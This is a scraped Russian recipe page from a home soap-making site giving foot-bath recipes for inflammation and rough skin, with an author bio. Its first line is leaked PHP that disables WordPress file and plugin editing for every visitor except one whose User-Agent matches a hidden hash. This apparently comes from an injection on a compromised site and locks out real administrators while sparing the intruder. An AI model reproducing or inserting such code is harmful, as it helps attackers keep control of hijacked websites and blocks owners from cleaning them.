if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Самые простые и действенные ванночки для ног | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепты простых и действенных ванночек для ног

Ванночки для ног не только позволяют снять усталость, но и помогают в борьбе с отеками. Здесь собраны различные рецепты ванночек на все случаи жизни.

Ван­ноч­ки для ног не толь­ко поз­во­ля­ют снять уста­лость, но и помо­га­ют в борь­бе с оте­ка­ми. Они помо­гут избе­жать появ­ле­ния тре­щин, от кото­рых потом изба­вить­ся будет намно­го труд­нее. Здесь собра­ны раз­лич­ные рецеп­ты ван­но­чек на все слу­чаи жизни.

Ванночка против воспалений

Эта ван­ноч­ка помо­жет в борь­бе с вос­па­ли­тель­ны­ми про­цес­са­ми, а ее при­го­тов­ле­ние не зай­мет мно­го вре­ме­ни. Взять по 2 ст. л. листьев подо­рож­ни­ка и кален­ду­лы. Залить их 2 лит­ра­ми кипят­ка и наста­и­вать 30 минут. После чего про­це­дить. Полу­чен­ный настой исполь­зо­вать в каче­стве ван­ноч­ки для ног.

Ванночки для огрубевшей кожи

С огру­бев­шей кожей стоп стал­ки­ва­ет­ся каж­дой. Осо­бен­но часто такая про­бле­ма воз­ни­ка­ет в лет­ний пери­од. В этом слу­чае при­го­дит­ся сле­ду­ю­щая ванночка:

  1. Хозяй­ствен­ное мыло необ­хо­ди­мо поте­реть на мел­кой тер­ке. Потре­бу­ет­ся чай­ная лож­ка такой стружки.
  2. Ее сме­ши­ва­ют с чай­ной лож­кой соды.
  3. После это­го в полу­чен­ную смесь вли­ва­ет­ся 2 лит­ра горя­чей воды.
  4. Ван­ноч­ка готова.

Дер­жать ноги в такой ван­ноч­ке сто­ит не менее 25 минут. После чего ноги выте­реть и сма­зать жир­ным кремом.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!